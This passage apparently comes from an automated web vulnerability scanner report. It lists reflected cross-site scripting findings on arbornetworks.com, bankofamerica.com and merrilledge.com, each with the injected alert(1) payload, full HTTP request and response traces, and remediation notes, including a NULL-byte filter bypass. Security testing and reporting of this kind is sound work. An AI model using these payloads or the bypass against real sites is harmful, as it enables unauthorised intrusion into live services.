Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="enac374\"><script>alert(1)</script>5a50e0c21ab">
...[SNIP]...

2.171. https://www.arbornetworks.com/ [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9071"><script>alert(1)</script>e4e30e085f was submitted in the mbfcookie[lang] cookie. This input was echoed as a9071\"><script>alert(1)</script>e4e30e085f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ena9071"><script>alert(1)</script>e4e30e085f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:04:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=e76d99c551293ab7d0c23ee0ecdb6485; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:04:18 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:04:18 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:04:19 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:04:20 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="ena9071\"><script>alert(1)</script>e4e30e085f">
...[SNIP]...

2.172. https://www.arbornetworks.com/en/lost-password-3.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /en/lost-password-3.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54038"><script>alert(1)</script>1e95dab8e0e was submitted in the mbfcookie[lang] cookie. This input was echoed as 54038\"><script>alert(1)</script>1e95dab8e0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/lost-password-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en54038"><script>alert(1)</script>1e95dab8e0e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:04:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=9eea038b074e30087eeedae6e935ba9a; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:04:40 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:04:40 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:04:41 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:04:41 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en54038\"><script>alert(1)</script>1e95dab8e0e">
...[SNIP]...

2.173. https://www.arbornetworks.com/en/partner-portal-home.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /en/partner-portal-home.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deb1d"><script>alert(1)</script>cfcda14f30a was submitted in the mbfcookie[lang] cookie. This input was echoed as deb1d\"><script>alert(1)</script>cfcda14f30a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/partner-portal-home.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=endeb1d"><script>alert(1)</script>cfcda14f30a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response (redirected)

HTTP/1.0 404 NOT FOUND
Date: Thu, 03 Feb 2011 00:04:54 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=f1fe583671ff7bddd5f555081913ea24; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:04:54 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:04:54 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:04:55 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:04:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="endeb1d\"><script>alert(1)</script>cfcda14f30a">
...[SNIP]...

2.174. https://www.arbornetworks.com/index.php [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /index.php

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b457f"><script>alert(1)</script>667bdae159f was submitted in the mbfcookie[lang] cookie. This input was echoed as b457f\"><script>alert(1)</script>667bdae159f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /index.php?option=com_content&task=view&id=296&Itemid=297 HTTP/1.1
Host: www.arbornetworks.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; mbfcookie[lang]=enb457f"><script>alert(1)</script>667bdae159f; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; __utmc=186398841; __utmb=186398841.2.10.1296689848

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:47:30 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=-; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:47:29 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:47:29 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:47:30 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:47:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4889
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: PartnerLogi
...[SNIP]...
<meta lang="enb457f\"><script>alert(1)</script>667bdae159f">
...[SNIP]...

2.175. https://www.arbornetworks.com/index.php [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /index.php

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8239"><script>alert(1)</script>31f3540dcc0 was submitted in the mbfcookie[lang] cookie. This input was echoed as d8239\"><script>alert(1)</script>31f3540dcc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /index.php HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=end8239"><script>alert(1)</script>31f3540dcc0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:03:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=410866f9e5772176ae7e03196c5efdab; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:03:25 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:03:25 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:03:26 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:03:27 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="end8239\"><script>alert(1)</script>31f3540dcc0">
...[SNIP]...

2.176. https://www.arbornetworks.com/register.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /register.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bddb"><script>alert(1)</script>119487711af was submitted in the mbfcookie[lang] cookie. This input was echoed as 1bddb\"><script>alert(1)</script>119487711af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /register.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en1bddb"><script>alert(1)</script>119487711af; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:06:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=789c30ca4dc20e92c36bbaf88590c360; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:06:21 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:06:21 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:06:22 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:06:23 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: PartnerLogi
...[SNIP]...
<meta lang="en1bddb\"><script>alert(1)</script>119487711af">
...[SNIP]...

2.177. https://www.bankofamerica.com/privacy/Control.do [BOA_0020 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /privacy/Control.do

Issue detail

The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0853'%3balert(1)//b444241d7da was submitted in the BOA_0020 cookie. This input was echoed as b0853';alert(1)//b444241d7da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy/Control.do HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9b0853'%3balert(1)//b444241d7da; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:17 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=00004QCD_ZjewAQatQwb0kn5dXN:12qb4kb6q; Path=/
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:16 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descri
...[SNIP]...
<!--


               cmSetProduction();
       

               cmCreateRegistrationTag(null,
                   'overview',
                   '20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9b0853';alert(1)//b444241d7da',
                   false,
                   null,
                   null,
                   'privacy',
                   null,
                   null,
                   null);
       
       
//-->
...[SNIP]...

2.178. https://www.bankofamerica.com/privacy/index.jsp [BOA_0020 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /privacy/index.jsp

Issue detail

The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fed0'%3balert(1)//f83f2273ab8 was submitted in the BOA_0020 cookie. This input was echoed as 3fed0';alert(1)//f83f2273ab8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de93fed0'%3balert(1)//f83f2273ab8; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:15 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000CnfCKRIifEAopeDjObSoiF3:12qb4k93q; Path=/
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:14 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descri
...[SNIP]...
<!--


               cmSetProduction();
       

               cmCreateRegistrationTag(null,
                   'overview',
                   '20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de93fed0';alert(1)//f83f2273ab8',
                   false,
                   null,
                   null,
                   'privacy',
                   null,
                   null,
                   null);
       
       
//-->
...[SNIP]...

2.179. https://www.bankofamerica.com/smallbusiness/index.jsp [BOA_0020 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /smallbusiness/index.jsp

Issue detail

The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0296'%3balert(1)//224de741dab was submitted in the BOA_0020 cookie. This input was echoed as a0296';alert(1)//224de741dab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /smallbusiness/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9a0296'%3balert(1)//224de741dab; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:39 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000iSQjObSnt8ukh_g0-dQwNmC:12qb4k2ev; Path=/
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:38 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descript
...[SNIP]...
<!--


               cmSetProduction();
       

                                   cmCreateRegistrationTag(null,
                   'smbiz',
                   '20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9a0296';alert(1)//224de741dab',
                   false,
                   null,
                   null,
                   'homepage');
//-->
...[SNIP]...

2.180. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/merrill-edge-advisory-center.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9e1d"><script>alert(1)</script>a47d51819dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9e1d"><script>alert(1)</script>a47d51819dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/merrill-edge-advisory-center.aspx?%00f9e1d"><script>alert(1)</script>a47d51819dc=1 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:19:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=BfHCSpf1XdlgqGUGWs5GJb7ApnrhS12v/Tvpa1aJhw0ZnGGnuZ6bTj58dvvXGcwfnckNONxzCEv1N22wUiaJsnm+vXwcidlJpMoGsMtahznFQYgoPc905EhsHsqhiOZH7Rxb0WWIDp1DQKg3EVdq6d+bjMi2o93Ny3EQ9mFhn8xCCDN8lX7473ePJ3uHJW3tZ8tQGk1AzMZRg4gB/N42hMRP+0I3UTYZzoYtJRcPMbuN1mRYsfJrzM6v7u+W68Hu5OW8xC6B802FtyllZlajSovSkJ4MqUrg8+eW1+guvwhGlAUjGQlQRuEJcUjt9YU60Qd/Law8UckN1K81LJjhKLf8x0wWLo7yi4BRrMXjHHosEfh1Xme+65zDrtvFBY5uADVwNpvE/hK+SrKanl4NaTPGdsMNm3ZJ+BecNOBwNfIWEbjY/rC5GP6qWY/hy5xZA4NpXENbXDQ+KIRUclZPf39f6qyFLqD3aaVfNPm3ec9qyLzhCl1ZxryNdB5Ut/OqS7gCqzFaNwXZyw94qSICMytNigTk/7mGjQ+94Nb5rCUS4kteonhMxxk/8AQq21Rgxw9XA8WlCz6O0C+aLkuzjmG1kiu8jF+tTv1mU8RIZdeAXka/dCS99D4tuy14uRR9; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Location: http://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx?%00f9e1d%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea47d51819dc=1
Set-Cookie: pxs=82f6fd15b4a44839afcaacbd61ee9100; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 101126


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<a href="../System/SearchResults.aspx?.f9e1d"><script>alert(1)</script>a47d51819dc=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...

2.181. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx [src_cd parameter]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.merrilledge.com
Path:   /m/pages/merrill-edge-advisory-center.aspx

Issue detail

The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0095641'%3b9ef12e8200f was submitted in the src_cd parameter. This input was echoed as 95641';9ef12e8200f in the application's response.

